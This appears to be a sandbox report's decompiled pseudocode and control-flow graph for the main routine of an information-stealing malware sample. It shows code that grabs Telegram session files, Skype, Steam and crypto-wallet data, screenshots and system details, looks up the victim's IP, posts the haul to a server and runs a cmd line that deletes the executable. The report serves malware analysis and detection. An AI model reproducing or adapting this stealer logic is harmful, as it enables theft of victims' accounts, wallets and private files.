                                                                      control_flow_graph 4 419108-41910b 5 419110-419115 4->5 5->5 6 419117-4191a8 call 403980 call 4034e4 call 40357c call 40561c call 407d24 call 406c4c call 403798 call 403990 CreateMutexA 5->6 24 419f30-41a139 call 4034e4 call 403b98 call 4034e4 call 403b98 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b80 call 403508 call 403b98 call 4034e4 call 403b98 call 4034e4 call 403b98 call 4034e4 call 403b98 call 4034e4 call 403b98 call 403508 call 404224 call 403508 call 4034e4 * 2 call 403508 * 2 call 4034e4 6->24 25 4191ae-4191bb call 4034e4 6->25 31 4191c0-4191c3 25->31 33 4191c5-4191e2 call 4036cc call 403798 31->33 34 4191e4-419259 call 418f9c call 406c4c call 406810 call 4037dc call 4176d8 call 418688 call 4176d8 call 403790 31->34 33->31 33->34 34->24 72 41925f-41926c call 4038dc 34->72 72->24 78 419272-419321 call 407428 call 406984 call 407428 call 406ae4 call 40795c call 407428 call 406984 call 4080c4 call 408328 call 40dc44 call 4045ec 72->78 123 419327-419328 78->123 124 419909-419c2e call 417290 call 403850 call 40dce8 call 406c4c call 406810 call 407a4c call 406810 call 406bb4 call 40377c call 406810 call 4066c0 call 40377c call 406810 call 406610 call 40377c call 406810 call 4065cc call 40377c call 406810 call 406fdc call 40377c call 406810 call 406fdc call 40377c call 406810 call 406fdc call 40377c call 406810 call 406fdc call 40377c call 406810 * 2 call 407d24 call 406810 call 403850 call 403798 call 4063a4 call 40653c call 40dee4 call 403850 78->124 127 41932a-419338 call 403790 123->127 401 419c30-419c54 call 403850 call 403798 124->401 402 419c59-419ca1 call 4176d8 call 418688 call 4050c8 call 403790 124->402 137 419901-419903 127->137 138 41933e-419340 127->138 137->124 137->127 141 419492-41949b 138->141 142 419346-419350 138->142 145 4194a1-4194d0 call 40795c call 40357c call 403a78 141->145 146 419825-41982e 141->146 147 419372-41937c 142->147 148 419352 call 40d7f0 142->148 210 419742-419820 call 403d2c * 2 call 407048 call 4038dc * 2 call 403850 call 403d2c * 2 call 4037dc call 403d2c call 414408 145->210 211 4194d6-419503 call 407428 145->211 154 419830-419846 call 403850 146->154 155 41984b-419854 146->155 149 4193b1-4193bb 147->149 150 41937e-4193ac call 414028 call 408120 call 405528 call 40dce8 147->150 165 419357-41936d call 4053d8 call 40dce8 148->165 162 4193c2-4193cc 149->162 163 4193bd call 414098 149->163 150->149 154->155 155->137 164 41985a-41987d call 40795c call 4038dc 155->164 172 4193ec-4193f6 162->172 173 4193ce-4193e0 call 415ea8 162->173 163->162 203 4198f1-4198fc call 40dce8 164->203 204 41987f-4198ef call 418688 call 407428 * 2 call 403850 call 40dce8 164->204 165->147 177 419402-41940c 172->177 178 4193f8-4193fd call 414cb8 172->178 173->172 195 4193e2-4193e7 call 4050c8 173->195 188 41942f-419439 177->188 189 41940e-41942a call 414408 177->189 178->177 199 419445-41944f 188->199 200 41943b-419440 call 414f40 188->200 189->188 195->172 212 419451-41947d GetSystemMetrics * 2 call 4178b4 call 40dce8 199->212 213 419482-41948c 199->213 200->199 203->137 204->137 210->146 211->24 241 419509-41950f 211->241 212->213 213->141 216 41948e 213->216 216->141 246 419734-419737 241->246 249 419514-41954a call 406fdc call 40377c call 403a78 246->249 250 41973d 246->250 290 419731 249->290 291 419550-41972c call 403c98 call 403850 call 403d2c * 2 call 4070bc call 40377c call 4034e4 call 403850 call 403d2c call 4070bc call 403d58 call 40377c call 403d2c call 40781c call 40377c call 403d2c * 2 call 407048 call 4038dc * 2 call 4037dc call 403d2c * 2 call 4037dc call 403d2c call 414408 249->291 250->146 290->246 291->290 401->402 415 419db1-419dd1 call 4087dc call 407d24 call 4038dc 402->415 416 419ca7-419cc4 call 40795c call 4045ec 402->416 430 419dd3-419de0 call 4038dc 415->430 431 419dec-419df9 call 4038dc 415->431 416->415 425 419cca-419ccb 416->425 427 419ccd-419d03 call 4047a8 call 40795c call 4045ec 425->427 448 419da9-419dab 427->448 449 419d09-419d18 call 4038dc 427->449 430->431 440 419de2-419de7 call 407dd4 430->440 431->24 438 419dff-419e03 431->438 438->24 441 419e09-419f2b call 4028e0 call 4062d8 call 403d3c call 4062d8 call 402754 call 403d2c call 40770c call 403e1c call 403d3c call 402754 call 403d2c call 407798 call 403d3c ExitProcess 438->441 440->24 448->415 448->427 449->448 455 419d1e-419d42 call 40795c call 4045ec 449->455 464 419d85-419d89 455->464 465 419d44-419d45 455->465 464->448 468 419d8b-419da4 call 4038dc call 418cf4 464->468 467 419d4c-419d7d call 406318 call 403a78 465->467 467->464 482 419d7f-419d83 467->482 468->448 482->464 482->467
                                                                      C-Code - Quality: 68%
                                                                      			E00419108(char __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				void* _v56;
				char _v60;
				char _v64;
				signed int _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v88;
				char* _v92;
				char _v96;
				char _v100;
				char* _v104;
				void* _v108;
				char _v112;
				char _v241;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				char _v304;
				char _v308;
				char _v312;
				intOrPtr _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				void* _v344;
				void* _v348;
				void* _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v448;
				char _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				char _v464;
				char _v468;
				char _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v492;
				char _v496;
				char _v500;
				char _v504;
				char _v508;
				char _v512;
				char _v516;
				char _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				intOrPtr _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				void* _t446;
				void* _t452;
				intOrPtr* _t453;
				intOrPtr _t546;
				intOrPtr* _t616;
				intOrPtr* _t623;
				intOrPtr* _t630;
				intOrPtr* _t637;
				intOrPtr _t651;
				intOrPtr* _t654;
				intOrPtr* _t657;
				intOrPtr* _t660;
				intOrPtr* _t663;
				intOrPtr _t668;
				intOrPtr* _t671;
				void* _t677;
				intOrPtr* _t714;
				intOrPtr _t756;
				signed int _t806;
				intOrPtr* _t827;
				intOrPtr* _t830;
				signed int _t837;
				signed int _t884;
				intOrPtr _t907;
				int _t920;
				intOrPtr* _t932;
				void* _t954;
				signed int _t955;
				signed int _t956;
				void* _t957;
				void* _t975;
				intOrPtr _t983;
				intOrPtr _t1001;
				intOrPtr* _t1045;
				intOrPtr* _t1072;
				void* _t1094;
				void* _t1102;
				void* _t1132;
				void* _t1134;
				void* _t1135;
				signed int _t1137;
				intOrPtr _t1140;
				intOrPtr _t1141;
				void* _t1146;
				void* _t1167;
				void* _t1173;
				void* _t1181;
				void* _t1183;

				_t1183 = __fp0;
				_t1130 = __edi;
				_t1140 = _t1141;
				_t957 = 0x51;
				do {
					_push(0);
					_push(0);
					_t957 = _t957 - 1;
					_t1142 = _t957;
				} while (_t957 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t1140);
				_push(0x41a13a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1141;
				E004034E4( &_v72);
				_v82 = 0;
				_v81 = 0;
				E0040357C( &_v88, 0x41a158);
				E0040561C();
				E00407D24( &_v308, _t1142);
				_push( &_v308);
				E00406C4C( &_v312, __ebx, __esi); // executed
				_pop(_t446);
				E00403798(_t446, _v312);
				_t452 = CreateMutexA(0, 0, E00403990(_v308)); // executed
				_v108 = _t452;
				_t453 =  *0x41b558; // 0x41c6a4
				if( *((intOrPtr*)( *_t453))() == 0xb7) {
					L68:
					_pop(_t983);
					 *[fs:eax] = _t983;
					_push(E0041A144);
					E004034E4( &_v652);
					E00403B98( &_v648, 2);
					E004034E4( &_v640);
					E00403B98( &_v636, 5);
					E00403508( &_v616, 0xa);
					E00403B80( &_v576);
					E00403508( &_v572, 2);
					E00403B80( &_v564);
					E00403508( &_v560, 2);
					E00403B80( &_v552);
					E00403508( &_v548, 2);
					E00403B80( &_v540);
					E00403508( &_v536, 2);
					E00403B80( &_v528);
					E00403508( &_v524, 2);
					E00403B80( &_v516);
					E00403508( &_v512, 2);
					E00403B80( &_v504);
					E00403508( &_v500, 2);
					E00403B80( &_v492);
					E00403508( &_v488, 0xa);
					E00403B98( &_v448, 2);
					E004034E4( &_v440);
					E00403B98( &_v436, 3);
					E004034E4( &_v424);
					E00403B98( &_v420, 2);
					E004034E4( &_v412);
					E00403B98( &_v408, 8);
					E004034E4( &_v376);
					E00403B98( &_v372, 4);
					E00403508( &_v356, 0xd);
					_t1001 =  *0x405f2c; // 0x405f30
					E00404224( &_v60, 5, _t1001);
					E00403508( &_v40, 7);
					E004034E4( &_v8);
					E004034E4( &_v112);
					E00403508( &_v104, 5);
					E00403508( &_v80, 3);
					return E004034E4( &_v64);
				} else {
					E004034E4( &_v112);
					_t954 = 0x44d;
					_t1137 = 0x41b0fc;
					while( *_t1137 != 0) {
						E004036CC();
						E00403798( &_v112, _v316);
						_t1137 = _t1137 + 1;
						_t954 = _t954 - 1;
						if(_t954 != 0) {
							continue;
						}
						break;
					}
					E00418F9C(_v112, _t954, _t957, _t1130, _t1137);
					E00406C4C( &_v324, _t954, _t1137); // executed
					E00406810(_v324, _t954, _t957,  &_v320, _t1130, _t1137);
					E004037DC( &_v32, _v320, _v88);
					E004176D8( &_v32, _t954, 0x80000, _v88, _t1130, _t1137);
					_t546 =  *0x41c8c0; // 0x2a10260, executed
					E00418688(_t546, _t954, _v32, _t1130, _t1137,  &_v16); // executed
					E004176D8( &_v16, _t954, 0x80000, _v88, _t1130, _t1137);
					_t1146 = E00403790(_v16) - 0x2710;
					if(_t1146 < 0) {
						goto L68;
					}
					E004038DC(_v16, 0x41a164);
					if(_t1146 == 0) {
						goto L68;
					}
					E00407428(0x41a184, _t954, 0x41a174, _v16, _t1137,  &_v328);
					E00406984(_v328, _t954,  &_v36, _t1130, _t1137);
					E00407428(0x41a1a0, _t954, 0x41a190, _v16, _t1137,  &_v332);
					E00406AE4(_v332, _t954,  &_v40, _t1130, _t1137);
					E0040795C(0x41a1ac,  &_v44, _v36, _t1146);
					_t968 = 0x41a1b8;
					E00407428(0x41a1c8, _t954, 0x41a1b8, _v16, _t1137,  &_v340);
					_t1017 =  &_v336;
					E00406984(_v340, _t954,  &_v336, _t1130, _t1137);
					E004080C4(_v336, _t1146);
					E00408328(_v40, _t954,  &_v336, _t1130, _t1137); // executed
					E0040DC44();
					_t1132 = E004045EC(_v44) - 1;
					if(_t1132 < 0) {
						L48:
						_push(_v8);
						_push(0x41a1ac);
						E00417290( &_v464, _t954, _t1017, _t1132, _t1137);
						_push(_v464);
						E00403850();
						E0040DCE8(_v460, _t954, "System.txt", _t1132, _t1137);
						E00406C4C( &_v472, _t954, _t1137);
						E00406810(_v472, _t954, _t968,  &_v468, _t1132, _t1137);
						_push(_v468);
						_push(0x41a3e8);
						E00407A4C( &_v480, _t954, _t1132, _t1137);
						E00406810(_v480, _t954, _t968,  &_v476, _t1132, _t1137);
						_push(_v476);
						_push(0x41a3e8);
						E00406BB4( &_v492);
						E0040377C( &_v488, _v492);
						E00406810(_v488, _t954, _t968,  &_v484, _t1132, _t1137);
						_push(_v484);
						_push(0x41a3e8);
						E004066C0( &_v504, _t1168);
						E0040377C( &_v500, _v504);
						E00406810(_v500, _t954, _t968,  &_v496, _t1132, _t1137);
						_push(_v496);
						_push(0x41a3e8);
						E00406610( &_v516);
						E0040377C( &_v512, _v516);
						E00406810(_v512, _t954, _t968,  &_v508, _t1132, _t1137);
						_push(_v508);
						_push(0x41a3e8);
						E004065CC( &_v528);
						E0040377C( &_v524, _v528);
						E00406810(_v524, _t954, _t968,  &_v520, _t1132, _t1137);
						_push(_v520);
						_push(0x41a3e8);
						_t616 =  *0x41b5b8; // 0x41b0b8
						E00406FDC( *_t616, _t954,  &_v540, _t1137, _t1168);
						E0040377C( &_v536, _v540);
						E00406810(_v536, _t954, _t968,  &_v532, _t1132, _t1137);
						_push(_v532);
						_push(0x41a3e8);
						_t623 =  *0x41b5c4; // 0x41b0b0
						E00406FDC( *_t623, _t954,  &_v552, _t1137, _t1168);
						E0040377C( &_v548, _v552);
						E00406810(_v548, _t954, _t968,  &_v544, _t1132, _t1137);
						_push(_v544);
						_push(0x41a3e8);
						_t630 =  *0x41b584; // 0x41b0b4
						E00406FDC( *_t630, _t954,  &_v564, _t1137, _t1168);
						E0040377C( &_v560, _v564);
						E00406810(_v560, _t954, _t968,  &_v556, _t1132, _t1137);
						_push(_v556);
						_push(0x41a3e8);
						_t637 =  *0x41b638; // 0x41b0ac
						E00406FDC( *_t637, _t954,  &_v576, _t1137, _t1168);
						E0040377C( &_v572, _v576);
						E00406810(_v572, _t954, _t968,  &_v568, _t1132, _t1137);
						_push(_v568);
						_push(0x41a3e8);
						E00406810(_v8, _t954, _t968,  &_v580, _t1132, _t1137);
						_push(_v580);
						_push(0x41a3e8);
						E00407D24( &_v588, _t1168);
						E00406810(_v588, _t954, _t968,  &_v584, _t1132, _t1137);
						_push(_v584);
						E00403850();
						_t651 =  *0x41b5f4; // 0x41b0bc
						_t1045 =  *0x41b5f4; // 0x41b0bc
						E00403798(_t651,  *_t1045);
						_push(_v24);
						_t654 =  *0x41b5f4; // 0x41b0bc
						_push( *_t654);
						E004063A4( &_v592, _t954, _t1132, _t1137);
						_push(_v592);
						_t657 =  *0x41b5f4; // 0x41b0bc
						_push( *_t657);
						E0040653C( &_v596, _t954, _t968, _t1132, _t1137);
						_push(_v596);
						_t660 =  *0x41b5f4; // 0x41b0bc
						_push( *_t660);
						E0040DEE4( &_v600, _t954, _t1168);
						_push(_v600);
						_t663 =  *0x41b5f4; // 0x41b0bc
						_push( *_t663);
						E00403850();
						_t1169 = _v81 - 1;
						if(_v81 == 1) {
							_push(_v76);
							_push(0x41a3b8);
							_push(_v80);
							E00403850();
							E00403798( &_v20, _v604);
						}
						E004176D8( &_v20, _t954, 0x80000, _v88, _t1132, _t1137);
						_t970 = 0;
						_t668 =  *0x41c8c0; // 0x2a10260
						E00418688(_t668, _t954, _v20, _t1132, _t1137,  &_v608);
						_t671 =  *0x41b60c; // 0x41c6a0
						 *((intOrPtr*)( *_t671))(_v108);
						E004050C8(0x41a3f4, _t954, _t1132, _t1137, _t1169);
						_t677 = E00403790(_v72);
						_t1170 = _t677 - 3;
						if(_t677 <= 3) {
							L62:
							E004087DC(_t954, _t1137);
							E00407D24( &_v616, _t1181);
							E004038DC(_v616, 0x41a424);
							if(_t1181 != 0) {
								L65:
								E004038DC(_v8, 0x41a430);
								if(__eflags == 0) {
									__eflags = _v82 - 1;
									if(_v82 == 1) {
										E004028E0( &_v304, 0x3c);
										_v304 = 0x3c;
										_v300 = 0x1c0;
										_v296 = 0;
										_v292 = 0;
										E004062D8(L"%comspec%",  &_v620, __eflags);
										_v288 = E00403D3C(_v620);
										E004062D8(L"/c %WINDIR%\\system32\\timeout.exe 3 & del \"",  &_v628, __eflags);
										E00402754(0,  &_v640);
										E00403D2C( &_v636, _v640);
										E0040770C(_v636, _t954, 0,  &_v632, _t1137, __eflags);
										E00403E1C();
										_v284 = E00403D3C(_v624);
										E00402754(0,  &_v652);
										E00403D2C( &_v648, _v652);
										E00407798(_v648, _t954, 0,  &_v644, _t1137, __eflags);
										_v280 = E00403D3C(_v644);
										__eflags = 0;
										_v276 = 0;
										_t714 =  *0x41b564; // 0x41c768
										 *((intOrPtr*)( *_t714))( &_v304, E0041A4AC, _v632, _v628);
										ExitProcess(0);
									}
								}
								goto L68;
							}
							E004038DC(_v8, 0x41a430);
							if(_t1181 != 0) {
								goto L65;
							}
							E00407DD4(_t954, _t970, _t1132, _t1137, _t1181);
							goto L68;
						} else {
							_t970 =  &_v52;
							E0040795C(0x41a1ac,  &_v52, _v72, _t1170);
							_t1132 = E004045EC(_v52) - 1;
							if(_t1132 < 0) {
								goto L62;
							}
							_t1134 = _t1132 + 1;
							_t955 = 0;
							do {
								_push(0);
								E004047A8();
								_t1141 = _t1141 + 4;
								_t970 =  &_v56;
								E0040795C(0x41a2dc,  &_v56,  *((intOrPtr*)(_v52 + _t955 * 4)), 0);
								_t1173 = E004045EC(_v56) - 4;
								if(_t1173 != 0) {
									goto L61;
								}
								E004038DC( *_v56, 0x41a400);
								if(_t1173 != 0) {
									goto L61;
								}
								_t970 =  &_v60;
								E0040795C(0x41a40c,  &_v60,  *((intOrPtr*)(_v56 + 0xc)), _t1173);
								_v83 = 0;
								_t1137 = E004045EC(_v60) - 1;
								if(_t1137 < 0) {
									L59:
									_t1179 = _v83 - 1;
									if(_v83 == 1) {
										E004038DC( *((intOrPtr*)(_v56 + 8)), 0x41a418);
										E00418CF4( *((intOrPtr*)(_v56 + 4)), _t955, 0x41a400 | _t1179 == 0x00000000, _t1134, _t1137);
									}
									goto L61;
								}
								_t1137 = _t1137 + 1;
								_v68 = 0;
								while(1) {
									E00406318( *((intOrPtr*)(_v60 + _v68 * 4)), _t955,  &_v612, _t1134, _t1137);
									_t1072 =  *0x41b568; // 0x41c66c
									_v83 = E00403A78(_v612,  *_t1072) != 0;
									if(_v83 == 1) {
										goto L59;
									}
									_v68 = _v68 + 1;
									_t1137 = _t1137 - 1;
									if(_t1137 != 0) {
										continue;
									}
									goto L59;
								}
								goto L59;
								L61:
								_t955 = _t955 + 1;
								_t1134 = _t1134 - 1;
								_t1181 = _t1134;
							} while (_t1181 != 0);
							goto L62;
						}
					} else {
						_t1135 = _t1132 + 1;
						_t956 = 0;
						do {
							if(E00403790( *((intOrPtr*)(_v44 + _t956 * 4))) < 5) {
								goto L47;
							}
							if(_t956 == 0) {
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 9)) == 0x2b) {
									E00414098();
								}
								_t907 =  *((intOrPtr*)(_v44 + _t956 * 4));
								_t1154 =  *((char*)(_t907 + 3)) - 0x2b;
								if( *((char*)(_t907 + 3)) == 0x2b) {
									E00415EA8(L"Coins", _t956, _t968, _t1017, _t1135, _t1137, _t1154);
									_t932 =  *0x41b5c4; // 0x41b0b0
									_t1155 =  *_t932;
									if( *_t932 > 0) {
										E004050C8(0x41a200, _t956, _t1135, _t1137, _t1155);
									}
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 4)) == 0x2b) {
									E00414CB8(L"Skype", _t956, _t1135, _t1137);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 5)) == 0x2b) {
									_t968 = L"Telegram";
									_t1017 = L"D877F783D5*,map*";
									E00414408(L"%appdata%\\Telegram Desktop\\tdata\\", _t956, L"Telegram", L"D877F783D5*,map*", _t1135, _t1137, 0, 0, 1, 0x3e8, 0);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 6)) == 0x2b) {
									E00414F40(L"Steam", _t956, _t1135, _t1137);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 7)) == 0x2b) {
									_push(0);
									_push(0x32);
									_push(L"image/jpeg");
									_push( &_v64);
									_push(GetSystemMetrics(1));
									_t920 = GetSystemMetrics(0);
									_t968 = 0;
									_pop(_t1094);
									E004178B4(_t920, _t956, 0, _t1094, _t1135, _t1137);
									_t1017 = "scr.jpg";
									E0040DCE8(_v64, _t956, "scr.jpg", _t1135, _t1137);
								}
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)) + 8)) == 0x2b) {
									_v82 = 1;
								}
							}
							_t756 = _v44;
							_t1162 =  *((char*)( *((intOrPtr*)(_t756 + _t956 * 4)))) - 0x46;
							if( *((char*)( *((intOrPtr*)(_t756 + _t956 * 4)))) != 0x46) {
								L41:
								if( *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)))) == 0x4c) {
									_push(_v72);
									_push( *((intOrPtr*)(_v44 + _t956 * 4)));
									_push(0x41a1ac);
									_t1017 = 3;
									E00403850();
								}
								_t1167 =  *((char*)( *((intOrPtr*)(_v44 + _t956 * 4)))) - 0x49;
								if(_t1167 == 0) {
									_t968 =  &_v48;
									E0040795C(0x41a2dc,  &_v48,  *((intOrPtr*)(_v44 + _t956 * 4)), _t1167);
									E004038DC( *((intOrPtr*)(_v48 + 4)), 0x41a348);
									if(_t1167 != 0) {
										_t1017 = "ip.txt";
										E0040DCE8( *((intOrPtr*)(_v48 + 4)), _t956, "ip.txt", _t1135, _t1137);
									} else {
										_v81 = 1;
										E00418688("http://ip-api.com/json", _t956, 0, _t1135, _t1137,  &_v28);
										E00407428("\"query\":\"", _t956, 0x41a380, _v28, _t1137,  &_v76);
										_t968 = 0x41a380;
										E00407428("\"countryCode\":\"", _t956, 0x41a380, _v28, _t1137,  &_v80);
										_push(_v76);
										_push(0x41a3b8);
										_push(_v80);
										E00403850();
										_t1017 = "ip.txt";
										E0040DCE8(_v456, _t956, "ip.txt", _t1135, _t1137);
									}
								}
							} else {
								E0040795C(0x41a2dc,  &_v48,  *((intOrPtr*)(_v44 + _t956 * 4)), _t1162);
								E0040357C( &_v92,  *((intOrPtr*)(_v48 + 8)));
								if(E00403A78(0x41a2e8, _v92) != 1) {
									E00403D2C( &_v428,  *((intOrPtr*)(_v48 + 0x1c)));
									_push(_v428);
									E00403D2C( &_v432,  *((intOrPtr*)(_v48 + 0x10)));
									_push(E00407048(_v432, _t956,  &_v48, __eflags));
									_push(E004038DC( *((intOrPtr*)(_v48 + 0x14)), 0x41a32c) & 0xffffff00 | __eflags == 0x00000000);
									_t806 = E004038DC( *((intOrPtr*)(_v48 + 0x18)), 0x41a32c);
									_t193 = __eflags == 0;
									__eflags = _t193;
									_push(_t806 & 0xffffff00 | _t193);
									_push(1);
									_push("Files\\");
									_push( *((intOrPtr*)(_v48 + 4)));
									_push(0x41a310);
									E00403850();
									E00403D2C( &_v436, _v440);
									_push(_v436);
									E00403D2C( &_v444,  *((intOrPtr*)(_v48 + 0xc)));
									_push(_v444);
									E004037DC( &_v452, 0x41a310,  *((intOrPtr*)(_v48 + 8)));
									E00403D2C( &_v448, _v452);
									_pop(_t1017);
									_pop(_t968);
									E00414408(_v448, _t956, _t968, _t1017, _t1135, _t1137);
									goto L41;
								}
								_t968 = 0x41a2f8;
								_t1017 = _v92;
								E00407428(0x41a2e8, _t956, 0x41a2f8, _v92, _t1137,  &_v104);
								_push( &_v241);
								_push(0x81);
								_t827 =  *0x41b59c; // 0x41c6fc
								if( *((intOrPtr*)( *_t827))() == 0) {
									goto L68;
								}
								_t1137 =  &_v241;
								while( *_t1137 != 0) {
									_t830 =  *0x41b54c; // 0x41c700
									E00406FDC( *((intOrPtr*)( *_t830))(_t1137), _t956,  &_v360, _t1137, __eflags);
									E0040377C( &_v356, _v360);
									_t1017 = _v104;
									_t837 = E00403A78(_v356, _v104);
									__eflags = _t837;
									if(_t837 != 0) {
										_push( &_v364);
										E00403C98( &_v368, _t1137);
										_push(_v368);
										_push("%DSK_");
										_push(_v104);
										E00403850();
										E00403D2C( &_v372, _v376);
										_push(_v372);
										E00403D2C( &_v380, _v92);
										_pop(_t1102);
										_t975 = 0x41a304;
										E004070BC(_v380, _t956, _t975, _t1102);
										E0040377C( &_v100, _v364);
										E004034E4( &_v96);
										_push( *((intOrPtr*)(_v48 + 4)));
										_push(0x41a310);
										_push(_v100);
										E00403850();
										E00403D2C( &_v388, _v96);
										E004070BC(_v388, _t956, 0, 0x41a318,  &_v384);
										E00403D58( &_v384, 0, 0x41a320, __eflags);
										E0040377C( &_v96, _v384);
										E00403D2C( &_v396, _v96);
										E0040781C(_v396, _t956,  &_v392, __eflags);
										E0040377C( &_v96, _v392);
										E00403D2C( &_v400,  *((intOrPtr*)(_v48 + 0x1c)));
										_push(_v400);
										E00403D2C( &_v404,  *((intOrPtr*)(_v48 + 0x10)));
										_push(E00407048(_v404, _t956, 0, __eflags));
										_push(E004038DC( *((intOrPtr*)(_v48 + 0x14)), 0x41a32c) & 0xffffff00 | __eflags == 0x00000000);
										_t884 = E004038DC( *((intOrPtr*)(_v48 + 0x18)), 0x41a32c);
										_t163 = __eflags == 0;
										__eflags = _t163;
										_push(_t884 & 0xffffff00 | _t163);
										_push(1);
										E004037DC( &_v412, _v96, "Files\\");
										E00403D2C( &_v408, _v412);
										_push(_v408);
										E00403D2C( &_v416,  *((intOrPtr*)(_v48 + 0xc)));
										_push(_v416);
										E004037DC( &_v424, 0x41a310, _v100);
										E00403D2C( &_v420, _v424);
										_pop(_t1017);
										_pop(_t968);
										E00414408(_v420, _t956, _t968, _t1017, _t1135, _t1137);
									}
									_t1137 = _t1137 + 4;
									__eflags = _t1137;
								}
								goto L41;
							}
							L47:
							_t956 = _t956 + 1;
							_t1135 = _t1135 - 1;
							_t1168 = _t1135;
						} while (_t1135 != 0);
						goto L48;
					}
				}
			}















































































































































































                                                                      0x00419108
                                                                      0x00419108
                                                                      0x00419109
                                                                      0x0041910b
                                                                      0x00419110
                                                                      0x00419110
                                                                      0x00419112
                                                                      0x00419114
                                                                      0x00419114
                                                                      0x00419114
                                                                      0x00419117
                                                                      0x00419118
                                                                      0x00419119
                                                                      0x0041911a
                                                                      0x00419120
                                                                      0x00419127
                                                                      0x00419128
                                                                      0x0041912d
                                                                      0x00419130
                                                                      0x00419136
                                                                      0x0041913b
                                                                      0x0041913f
                                                                      0x0041914b
                                                                      0x00419150
                                                                      0x0041915b
                                                                      0x00419166
                                                                      0x0041916d
                                                                      0x00419178
                                                                      0x00419179
                                                                      0x00419195
                                                                      0x00419197
                                                                      0x0041919a
                                                                      0x004191a8
                                                                      0x00419f30
                                                                      0x00419f32
                                                                      0x00419f35
                                                                      0x00419f38
                                                                      0x00419f43
                                                                      0x00419f53
                                                                      0x00419f5e
                                                                      0x00419f6e
                                                                      0x00419f7e
                                                                      0x00419f89
                                                                      0x00419f99
                                                                      0x00419fa4
                                                                      0x00419fb4
                                                                      0x00419fbf
                                                                      0x00419fcf
                                                                      0x00419fda
                                                                      0x00419fea
                                                                      0x00419ff5
                                                                      0x0041a005
                                                                      0x0041a010
                                                                      0x0041a020
                                                                      0x0041a02b
                                                                      0x0041a03b
                                                                      0x0041a046
                                                                      0x0041a056
                                                                      0x0041a066
                                                                      0x0041a071
                                                                      0x0041a081
                                                                      0x0041a08c
                                                                      0x0041a09c
                                                                      0x0041a0a7
                                                                      0x0041a0b7
                                                                      0x0041a0c2
                                                                      0x0041a0d2
                                                                      0x0041a0e2
                                                                      0x0041a0ea
                                                                      0x0041a0f5
                                                                      0x0041a102
                                                                      0x0041a10a
                                                                      0x0041a112
                                                                      0x0041a11f
                                                                      0x0041a12c
                                                                      0x0041a139
                                                                      0x004191ae
                                                                      0x004191b1
                                                                      0x004191b6
                                                                      0x004191bb
                                                                      0x004191c0
                                                                      0x004191cd
                                                                      0x004191db
                                                                      0x004191e0
                                                                      0x004191e1
                                                                      0x004191e2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004191e2
                                                                      0x004191e7
                                                                      0x004191f2
                                                                      0x00419203
                                                                      0x00419214
                                                                      0x00419224
                                                                      0x00419232
                                                                      0x00419237
                                                                      0x00419247
                                                                      0x00419254
                                                                      0x00419259
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00419267
                                                                      0x0041926c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00419286
                                                                      0x00419294
                                                                      0x004192ad
                                                                      0x004192bb
                                                                      0x004192cb
                                                                      0x004192d7
                                                                      0x004192e4
                                                                      0x004192ef
                                                                      0x004192f5
                                                                      0x00419300
                                                                      0x00419308
                                                                      0x0041930f
                                                                      0x0041931e
                                                                      0x00419321
                                                                      0x00419909
                                                                      0x00419909
                                                                      0x0041990c
                                                                      0x00419917
                                                                      0x0041991c
                                                                      0x0041992d
                                                                      0x0041993d
                                                                      0x00419948
                                                                      0x00419959
                                                                      0x0041995e
                                                                      0x00419964
                                                                      0x0041996f
                                                                      0x00419980
                                                                      0x00419985
                                                                      0x0041998b
                                                                      0x00419996
                                                                      0x004199a7
                                                                      0x004199b8
                                                                      0x004199bd
                                                                      0x004199c3
                                                                      0x004199ce
                                                                      0x004199df
                                                                      0x004199f0
                                                                      0x004199f5
                                                                      0x004199fb
                                                                      0x00419a06
                                                                      0x00419a17
                                                                      0x00419a28
                                                                      0x00419a2d
                                                                      0x00419a33
                                                                      0x00419a3e
                                                                      0x00419a4f
                                                                      0x00419a60
                                                                      0x00419a65
                                                                      0x00419a6b
                                                                      0x00419a76
                                                                      0x00419a7d
                                                                      0x00419a8e
                                                                      0x00419a9f
                                                                      0x00419aa4
                                                                      0x00419aaa
                                                                      0x00419ab5
                                                                      0x00419abc
                                                                      0x00419acd
                                                                      0x00419ade
                                                                      0x00419ae3
